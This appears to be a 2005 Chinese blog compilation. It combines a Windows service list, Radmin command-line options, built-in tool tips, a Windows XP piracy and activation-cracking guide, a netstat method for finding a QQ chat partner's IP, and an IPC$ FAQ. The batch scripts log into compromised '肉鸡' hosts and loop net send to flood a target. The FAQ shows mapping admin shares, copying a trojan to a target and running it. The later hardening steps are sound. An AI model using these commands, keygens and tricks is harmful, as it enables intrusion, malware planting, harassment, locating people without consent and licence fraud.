可执行文件的路径:C:\WINNT\System32\SCardSvr.exe
服务名称:SCardDrv
显示名称:Smart Card Helper
描述:提供对连接到计算机上旧式智能卡的支持。
可执行文件的路径:C:\WINNT\System32\SCardSvr.exe
服务名称:SENS
显示名称:System Event Notification
描述:跟踪系统事件,如登录 Windows,网络以及电源事件等。将这些事件通知给 COM+ 事件

系统 “订阅者(subscriber)”。
可执行文件的路径:C:\WINNT\system32\svchost.exe -k netsvcs
服务名称:Schedule
显示名称:Task Scheduler
描述:允许程序在指定时间运行。
可执行文件的路径:C:\WINNT\system32\MSTask.exe
服务名称:LmHosts
显示名称:TCP/IP NetBIOS Helper Service
描述:允许对“TCP/IP 上 NetBIOS (NetBT)”服务以及 NetBIOS 名称解析的支持。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:TapiSrv
显示名称:Telephony
描述:提供 TAPI 的支持,以便程序控制本地计算机,服务器以及 LAN 上的电话设备和基于

IP 的语音连接。
可执行文件的路径:C:\WINNT\System32\svchost.exe -k netsvcs
服务名称:TlntSvr
显示名称:Telnet
描述:允许远程用户登录到系统并且使用命令行运行控制台程序。
可执行文件的路径:C:\WINNT\system32\tlntsvr.exe
服务名称:UPS
显示名称:Uninterruptible Power Supply
描述:管理连接到计算机的不间断电源(UPS)。
可执行文件的路径:C:\WINNT\System32\ups.exe
服务名称:UtilMan
显示名称:Utility Manager
描述:从一个窗口中启动和配置辅助工具
可执行文件的路径:C:\WINNT\System32\UtilMan.exe
服务名称:MSIServer
显示名称:Windows Installer
描述:根据包含在 .MSI 文件中的指示来安装、修复或删除软件。
可执行文件的路径:C:\WINNT\System32\MsiExec.exe /V
服务名称:WinMgmt
显示名称:Windows Management Instrumentation
描述:提供系统管理信息。
可执行文件的路径:C:\WINNT\System32\WBEM\WinMgmt.exe
服务名称:Wmi
显示名称:Windows Management Instrumentation Driver Extensions
描述:与驱动程序间交换系统管理信息。
可执行文件的路径:C:\WINNT\system32\Services.exe
服务名称:W32Time
显示名称:Windows Time
描述:设置计算机时钟。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:WMDM PMSP Service
显示名称:WMDM PMSP Service
描述:WMDM PMSP Service
可执行文件的路径:C:\WINNT\System32\mspmspsv.exe
服务名称:lanmanworkstation
显示名称:Workstation
描述:提供网络链结和通讯。
可执行文件的路径:C:\WINNT\System32\services.exe
服务名称:W3SVC
显示名称:World Wide Web Publishing Service
描述:通过 Internet 信息服务的管理单元提供 Web 连接和管理。
可执行文件的路径:C:\WINNT\System32\inetsrv\inetinfo.exe

Radmin Views 有一些命令列方式的参数可以用, 让您不需打开连络薄就可以连上
其它电脑
 
  
Radmin viewer 命令列参数
 Radmin Views 有一些命令列方式的参数可以用, 让您不需打开连络薄就可以连
上其它电脑.
使用方法: radmin.exe /connect:xxxxx:nnnn other_options 
例如:
radmin.exe /connect:server:1000 /fullscreen /encrypt
radmin.exe /connect:10.0.0.100:4000 /telnet
radmin.exe /connect:server /through:gate
参数:
/connect:xxxxx:nnnn - 指定对方的 IP 及 port Numbe. 如果您不用连络薄, 您
可用这个来连上远端的电脑.
/through:xxxxx:nnnn - 指定转接的机器 IP 及 port number.Radmin 可以让您
通过中间的 Radmin server连结到其它机器去, 这在有Firewall的网络下特别有
用.
/telnet - 使用 telnet, 而不是图形方式
/fullscreen - 指定全屏幕方式
/hicolor - 使用 65536 色 来传输. 
/noinput - 不要将自己的鼠标器及键盘讯号送到远端电脑.
/updates:nn - 指定每秒最多更新几个画面
/encrypt - 要对传输资料做加密.
/? - show help

Radmin server 命令列方式
通常您可以通过 Radmin 的 setup or install 程序来设定您的 Radmin server. 
但是您也可以使用 Radmin 的 command mode 方式来做设定.
例如密码, port number等等.
用法: r_server.exe <switches>
/setup - 跳出一个对号方块让您可以安装 service ,driver, password 及 port 
number.
例如: r_server.exe /setup
[/port:xxxx] [/pass:xxxxx] - 如果没有指定参数的话, r_server 会执行成 
Radmin 的服务器, 然后从您的参数或是 registry key中读取密码及port 
number.
例如: r_server.exe
例如: r_server.exe /pass:www.nz88.net
例如: r_server.exe /port:5505
例如: r_server.exe /port:3333 /pass:www.nz88.net
/save [/port:xxxx] [/pass:xxxxx] - 把密码及port number 存到 registry 
key去.
例如: r_server.exe /port:5505 /pass:qwerty /save
把密码(qwerty)及port number(5505) 存到 registry key去.,并且执行成 
Radmin Server.
例如: r_server.exe /save 
把预设的密码及port number 存到 registry key去..
/install - 安装 Radmin service (for Win95/98 or WinNT) 及 NT的驱动程序.
注意!! 如果要安装在 NT上 趋动程序 (raddrv.dll) 必须要放到您的 System32 
这目录下.
例如: r_server.exe /install
/uninstall - 反安装您的 Radmin.
例如: r_server.exe /uninstall
/installservice - 只装 Service 不装 driver (Win95/98 or WinNT)
例如: r_server.exe /installservice
/uninstallservice - 只反安装 Service.
注意 :如果反安装失败, 通常代表您还没把它装成 Service
例如: r_server.exe /uninstallservice
/installdrv -只装趋动程序 (WinNT)
注意: 驱动程序 (raddrv.dll) 必须要放到您的 System32 这目录下.
例如: r_server.exe /installdrv
/uninstalldrv - uninstall the driver only.
注意 :如果反安装失败, 通常代表您没有装 hook driver.
例如: r_server.exe /uninstalldrv
/silence - 不要跳出 ’error’ 或 ’ok’ 等等信息
/? - shows help

2005年05月24日

系统自带的系统工具

其实无论大家从什么地方,什么方法找到一些好用的工具,都不如Windows自带的工具用着方便(假设你区的地方正好不能上网,而你又没有准备好这些工具,那怎么办?呵呵,不用着急,用好下面几个Windows自带的小工具,可以使你事半功倍!)

1、msinfo32.exe

位于C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。

2、drwatson.exe –这个工具给我特别的亲密感觉:第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后,我马上试验~果然很有意思!LK007不愧是大哥!现在想起来都佩服不已~~~

位于C: \Windows \drwatson.exe,当某个应用程序在运行过程中出错时,它就会将出错的程序以及出错的内存地址一一记录下来,并保存为Windows的Drwatson子目录下的*.wlg记录文件。

3、sfc.exe

位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文件。

4、msconfig.exe

位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运行哪些应用程序等系统配置,从而达到快速排除故障的目的。

5、scanreg.exe

位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件,防止因注册表数据被破坏而导致的系统故障。

6、vcmui.exe

位于C:\Windows\vcmui.exe,在后台自动将被覆盖的驱动程序备份下来,当我们安装的新驱动出错时可用它进行恢复。

7、winrep.exe

位于C:\Windows\winrep.exe,能自动收集有关系统信息并提示用户输入故障所在,帮我们编写一篇完整的“求援”报告,并将其发送给有关技术维护人员,简化“求援”操作。

这七个Windows自带的小程序可以在开始菜单–运行中直接输入文件名(无需输入扩展名)调出该程序
31)批处理在入侵中的几则妙用!

A、简化IPC$登陆肉鸡的操作:

用记事本建立一个名字为:ipcruqin.bat的批处理文件,内容如下:

@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已经成功建立连接

之后,大家在CMD下输入:ipcruqin.bat 肉鸡IP 肉鸡admin帐号/用户的密码。就可以登陆上去了,而不需要那一大长串的命令了!

B、批处理轰炸对方电脑

打开一记事本,在里面输入如下内容:

@echo 正在轰炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 发送失败

将其保存为bat格式的文件即可,使用方法:*.bat(该批处理文件的名字)+ 空格 + 目标IP + 空格 + 你要对他说得话!

来源:http://wrsky.com

WinWinXP 自从出道以后,流行在盗版市场上有许多版本,究竟谁才是真正的最佳版本,怎么才能脱逃一次次 SP 升级带来的激活问题,本文会给你一个完整的答案。 biggrin.gif

一、揭露市场上最流行版本的前世今生:

Pro 版 WinXP 三种版本:OEM、零售、VOL 的详细比较。

因为有英文版三种 WinXP Pro 的原版,所以从英文版开始比较。

(一)、原版。

1、“OEM”与“零售版”比较,发现有 5 个文件不一致,他们是:

OEMbios.bi_;
OEMbios.ca_;
OEMbios.da_;
OEMbios.si_;
SETUPPP.INI。

(SETUPPP.INI 的区别是在用记事本打开后:“Pid=”的后三位分别是 OEM,000)

2、“零售版”与“VOL”版比较,发现有 8 个文件不一致,他们是:

OEMbios.bi_;
OEMbios.ca_;
OEMbios.da_;
OEMbios.si_;
SETUPPP.INI;
dpcdll.dl_;
Pidgen.dll;
nt5inf.ca_。

这两个版本中的“nt5inf.ca_”释放后是“安全编录文件”,再进行详细比较后发现他们的“安全编录”完全一致。所以这两个版本的不一致文件实际上只有 7 个,他们是:

OEMbios.bi_;
OEMbios.ca_;
OEMbios.da_;
OEMbios.si_;
SETUPPP.INI;
dpcdll.dl_;
Pidgen.dll。

(SETUPPP.INI 的区别是在用记事本打开后“ExtraData=”后面的内容不一致,“Pid=”的后三位分别是:000,270)

3、IBM 的英文 OEM 和中文 OEM 进行比较,发现四个 OEMbios 文件是完全一致的。

4、各个版本的原版与升级 SP1 后比较发现:“dpcdll.dl_、Pidgen.dll”升级了,其他 5 个文件不变。

(二)、原版升级成 SP1 后;原版升级成 SP2 后,结论同上。(而且“nt5inf.ca_”也完全一致了)

(三)、类推到简体版。

1、用简体零售版打造简体OEM版。(类推到 SP1、SP2 …..)

用 OEM 版的四个 OEMbios 文件覆盖零售版中的相同文件,将简体版中的“SETUPPP.INI”用记事本打开后把 000 换成 OEM。

(没有做完全测试,“SETUPPP.INI”的替换有可能不行,但是国外已经破解了“SETUPPP.INI”,只要把相应零售版中的“SETUPPP.INI”用记事本打开后把“Pid=”后面的内容换成“82503OEM”就适用任何厂家的 OEM)

2、用简体零售版打造简体 VOL 版。

(1)、打造原版的 VOL。

没有原版 VOL 的“dpcdll.dl_、Pidgen.dll”,我没有能力打造。

(2)、打造 SP2 版的 VOL。

用 WinRAR 打开官方的 SP2 升级包,释放下面两个文件:“ipseldpc.dl_、ipselPid.dll”,把“ipseldpc.dl_”改名为“dpcdll.dl_”,把“ipselPid.dll”改名为“Pidgen.dll”,接下来把改好名的上面两个文件和英文 VOL 版中的四个 OEMbios 文件覆盖打了 SP2 的简体零售版 WinXP,再把里面的“SETUPPP.INI”修改一下,把“Pid=”后面的内容改成:“51883270”。

国外已经破解了“SETUPPP.INI”,三个通用“Pid”分别是:

零 售:51882335;
O E M:82503OEM;
V O L:51883270。

OK 打造成功,测试成功,暂时起名为“WinXP 北京政府 VLK 集成 SP2 版”。

(3)、打造 SP1 版的 VOL。

为什么先造 SP2 版的 VOL,再造 SP1版的VOL呢?不怕您笑话,打造失败!

分析原因:用打造的 SP1 与上海政府版比较,发现有两个关键文件“licdll.dl_、winlogon.ex_”不一致,用上海版的“licdll.dl_、 winlogon.ex_”替换后,打造成功!也是因为这两个文件导致上海版不能再打一次 SP1,因为重打 SP1 后,这两个文件被官方 SP1 升级包里面的这两个文件替换了,也就是说官方 SP1 升级包不支持 VOL。不过令人高兴的是官方的 SP2 升级包已经支持 VOL 了,从这个侧面分析上海政府版可能是真的,或者说现在在中国有真正的 VOL 版存在。(所以要找到未升级过 SP1 的原版简体 VOL,我认为是不可能的,我做了另外一个测试,用上海版的两个文件替换 SP1 中的同名文件,把“licdll.dl_”释放出“licdll.dll”覆盖同名文件,用打造出的完美 SP1 升级包可以重新升级所有打过和没有打过 SP1 的简体 WinXP,当然包括上海政府版。如果上海版的“licdll.dl_、winlogon.ex_”是高手打造的,那么这两个文件也打造的相当完美。不过上海政府版的最大疑点在于他集成了 java 虚拟机。)

(4)、打造 SP3 版的 VOL。

呵呵~~,等出 SP3 之后自己打造吧!

二、关于上海 VOL 的真伪:

微软增值服务证明上海VOL非破解,OEM 不如 VOL。

微软的正版 WinXP 增值计划已经启动,正版用户可以上微软网站下载免费的正版软件,下载前要经过微软检测 KEY,盗版用户将无法享用,但是盗版用户可以享用正常的安全补丁升级。

我用的是上海 WinXP VOL,今天上网下载增值软件,发现提示是,我的版本是 VOL,但 VLK 是旧的,已经泄漏出来的,要我再买一个 VLK 号或是正版用户的话,向公司去要新换给公司的 VLK 号,通过上面的对话,我可以得出,中国是有 VOL 的,不是全由英文版修改的,至少我的是,接下来我用四合一算号器算了一个 VLK,改用改号器改上这个 VLK,再上微软网站,提示可以下载增值软件,看来算出来的 VLK 号还是可以用的
这是上海 WinXP VOL 是真正的 VOL 版的一个有力证明。另微软的网站上也有说明,中文是有 VOL版的。

如果说是英文版 VOL 修改的话,那上微软中国下载增值软件时,不可能出现提示说我的版本是 VOL 版的,因为如果是英文 VOL 修改版的话,在微软的中国页面上是不可能出现提示承认我的中文版是真的 VOL。

中文 VOL 是从 SP1 开始的,没有不集成 SP 的版本。

四合一算号器,可能是比尔盖茨制作的,目的是让全中国人民能用盗正版!

试了试改 BIOS 的联想版能否升级增值服务,说明:改的是 BIOS,不是 DMI,联想是借邻居家的新标原版 WinXP,到微软下载增值软件,进入验证这一步,提示要求输入 OEM 版电脑机箱后的序列号,本人无,因而无法享受增值,从这一点看,还是零售原版+在线激活 1.0 和 VOL 的上海版才算完美的 WinXP 版,这下网上应该少些网友到处寻找 OEM 的 WinXP 了吧 。

另:经试验,WinXP OEM 也可以使用增值服务,方法是用“四合一算号器”算“011字段”的号,也就是 VLK 号。方法略,看了前面的文章,大家应该可以自己去实际试试。

关于上海 VOL SP1 再装 SP1 会出现问题,这不是什么能够证明上海 VOL SP1 是破解的理由,因为针对中国,微软只出了 VOL SP1,没有不集成的 VOL,另网上下载的 SP1 是不支持这个已经集成了 SP1 的 VOL 版,但是 SP2 是完全支持的,关于该版本有虚拟机,而 SP1a 无,有的人就说这个版本是破解的,因为可疑,其实最早出的 SP1 不带 a 的,是集成有虚拟机的,SP1a 则无。

另:上海 VOL 是真的原版,只不过网上流传的多是用英文版改过的而已,如果你找到上海 VOL 原版,这个最好,还有就是中文的 VOL 都是带 SP1 的,无不集成的,中文的 VOL 微软 MSDN 发布的集成了 SP2 的版本也已经放出来了,在 JUJU 论坛上可以下载,不过俺还是最爱亲手集成 SP2,经历过才会更加珍惜,呵呵。


三、关于激活问题:

由于 SP2、SP1 使用的激活机制和原 WinXP 不同,而算号器是针对的原 WinXP,如果用四合一算号,安装原 WinXP,激活后再升级,则可以完美激活,但是使用集成 SP 的 WinXP 安装的话,由于激活机制变了将无法激活,这时可以用微软破解中心的在线激活程序达到完美激活。此外,对于追求非完美主义的人来说,只要能正常使用就可以了,有以下方法激活:

(一)、用“一步激活”这类软件,但这类软件,这些是属于破解软件,一般就是用破解了的文件替换原文件或是在开机时加载一个程序来防止 WinXP 激活提示,总之这类软件是最最最不可靠,而且对系统有影响的激活方式,相比下面介绍的用 VOL 的文件来替换零售版 WinXP 的文件的方法来说,后者都是使用的微软自己数字签名过的文件,而且不会有什么影响,前者则可轻易被微软发现并封,比如说“一步激活”这个程序就是一个伪激活程序,在你激活后,过一段时间就又会提示你要求激活,并最终不能激活你的系统,结果是激活期到,系统被锁死。

(二)、或到上海交大提供的 Windows 升级网站去,他可以自动用VOL的原版文件换你的文件,然后激活:盗版盗版 WinXP 只要上上海交大的 WinXP 更新就能变正版,无意中上了上海交大的 Windows update 网,速度比 MS 的要快,是同步更新的,而且会提示你,如果是盗版,就会给你 VLK 的序列号,挺奇怪的。

上海交通大学 Windows Update 自动更新服务:_blank>http://windowsupdate.sjtu.edu.cn

实现原理和我下面的是一样的,无非就是用 VOL 的原版文件来替换盗版 WinXP 的相应文件。

三、自己用 VOL 的原版文件替换。

四、用“四合一算号器”算号,用“改号器”改号,用“在线激活”激活,这是最完美的方法,不改一个字节。

注:上面四种方法自己选一个,

  另,下载的 VOL 要使用自己用“四合一算号器”算的号来进行安装,因为微软将部分流出来的 VLK 号给封了,所以说尽管你是 VOL 免激活版,便不能在线升级,只为序列号被封。

最后,介绍一下三个激活相关的工具

一、 “四合一算号器”:据说是比尔盖茨送给中国人的礼物,目的就是要让全中国人用上正版,用它算号,速度快,命中率百分之百,比起老式的算号器算一个号要花几个小时相比,用这个一秒钟就出来结果了,俺还没遇到不能激活的号,但也有一个可能,你的号被别人先算出用了,尽管几率小,但还是有可能,这时就要用到下面的换号器了。

二、“换号器”:使用算号器算的号安装系统后发现不能激活,这是因为你的号被别人用了,这时运行换号,将另算的号换上就可以激活了。

三、 “在线激活”:由于 WinXP 原版和集成 SP 的版本其激活机制不一样,这也就是为什么有的人算号、装原版、激活后再升SP能达到激活的目的,而使用集成了 SP 版的 WinXP 安装后激活或,先算号,装原版,装 SP,最后再激活这些方法不能激活。简单说一下在线激活的原理:WinXP 中有两个文件记载了当前的版本,是原版还是集成了 SP 的,在线激活用 WinXP 原版中的这两个文件替换掉装了 SP 后的这两个文件,使微软认为这是原版,按原版的激活机制给予激活,当激活后,在线激活程序又将替换的这两个文件换回去,也就是说使用这种方法是最完美的激活方法。

目前只有针对未集成 SP 的原版 WinXP 的算号器,传说国外已经出了 SP2 的算号器,俺没见过,不知……

2005年05月23日

查QQ好友IP地址还用得着这么麻烦吗?给QQ打个补丁不就行了吗?不错,这样做是很简单,但是如果是新出的QQ,“补丁”还没有做出来那又该怎么办呢?用IpSniper等软件呗,如果手头上没有又急着查又该怎么办呢?可以用其他软件,比方说……好了,说来说去都要别人的软件,为什么不试试DOS命令呢?即简单,又方便,还很环保(不像应用软件还得另外安装占用硬盘空间,使用时还占用相同资源)。

  不多啰嗦了,正式开始。 首先,用甜言蜜语、糖衣炮弹之类的武器把你想知道IP地址的那个人“请”到QQ的“二人世界”里。接着,我们在DOS窗口里(Win9x下叫DOS,Win2000下叫命令提示符)。输入如下命令:

  netstat -n

  你将看到:

  Active Connections
  Proto   Local Address   Foreign Address    State
  TCP  202.109.34.78:1200  202.121.139.35:61555  ESTABLISHED
  TCP  202.109.34.78:2694  202.109.72.40:6667   ESTABLISHED
  TCP  202.109.34.78:4869  211.202.1.227:23    ESTABLISHED

  好家伙,这么多IP!哪个才是我们要找的呢?别着急,往后看。我们现在退出“二人世界”,然后在DOS下再输入一次:

  netstat -n

  你将看到:

  Active Connections
  Proto   Local Address    Foreign Address    State
  TCP   202.109.34.78:1200  202.121.139.35:61555  TIME_WAIT
  TCP   202.109.34.78:2694  202.109.72.40:6667   ESTABLISHED
  TCP   202.109.34.78:4869  211.202.1.227:23    ESTABLISHED

  看出前后两次的区别了吗?没有看出来?仔细着看,你会发现:

  原来:TCP 202.109.34.78:1200 202.121.139.35:61555 ESTABLISHED
  现在:TCP 202.109.34.78:1200 202.121.139.35:61555 TIME_WAIT

  好了,现在你该知道了吧?对!和你聊天的人的IP就是:202.101.139.35!那你是怎么知道的呢?朋友,请看我们在“二人世界”时要传送消息,相互之间必然要产生连接(通过UDP协议),此时自然是“ESTABLISHED”了(以你用netstat -n命令的结果来说);而退出“二人世界”连接就断开了,自然就是“TIME_WAIT”了。

  很简单吧?用这种方法一个外来软件也没有用(netstat是Windows自带外部命令),是不是向我们前面所说的那样即简单又方便,还很环保?还不快试试!

2005年05月22日

常见问题和回答:
1,怎样建立空连接,它有什么用?
使用命令 net use \IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。

2,为什么我连不上IPC$?
1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2,确认你的命令没有打错。正确的命令是: net use \目标IP\ipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。

3,怎样打开目标的IPC$?
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。

4,怎样映射和访问默认共享?
使用命令 net use z: \目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IP\d$\path\muma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IP\d$ 。然后 copy muma.exe y:\path\muma.exe 。当路径中包含空格时,须用""将路径全引住。

5,如何删除映射和ipc$连接?
用命令 net use \IP\ipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。

6,连上ipc$然后我能做什么?
能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。

7,怎样防止别人用ips$和默认共享入侵我?
A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接

二 什么是ipc$
IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2004年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表


三 建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.


四 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)


五 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.


六 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。


七 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码,防止通过ipc$穷举密码


